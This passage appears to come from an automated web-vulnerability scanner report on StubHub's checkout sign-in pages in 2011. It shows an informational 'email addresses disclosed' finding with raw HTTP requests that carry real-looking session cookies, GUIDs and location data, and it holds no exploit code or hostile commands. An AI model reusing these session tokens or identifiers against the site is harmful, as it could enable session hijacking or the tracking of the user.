Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
</noscript><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201007270631.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201007290146.min.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-RC.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="https://cache1.stubhubstatic.com/resources/mojito/js/feature/checkout-1.0.js" type="text/javascript"></script>
...[SNIP]...

8. Email addresses disclosed  previous  next
There are 20 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

8.2. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/CheckoutSignin HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:51 GMT
Server: Apache
Set-Cookie: TLTHID=E2C29D3039C11039034DE73A37D19451; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1c55#198e/checkout/CheckoutSignin@srwp01byx003.stubprod.com
com-stubhub-dye: 1c55#198e/checkout/CheckoutSignin@srwp01byx003.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.3. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:47 GMT
Server: Apache
Set-Cookie: TLTHID=E0252D2239C1103900DBB402BF3CC721; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 65da#189/checkout/CheckoutSignin@srwp01byx006.stubprod.com
com-stubhub-dye: 65da#189/checkout/CheckoutSignin@srwp01byx006.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

8.4. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CD83878639C1103903C3B0044C7300DA; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#1983/checkout/CheckoutSignin@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#1983/checkout/CheckoutSignin@srwp01byx005.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

8.5. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 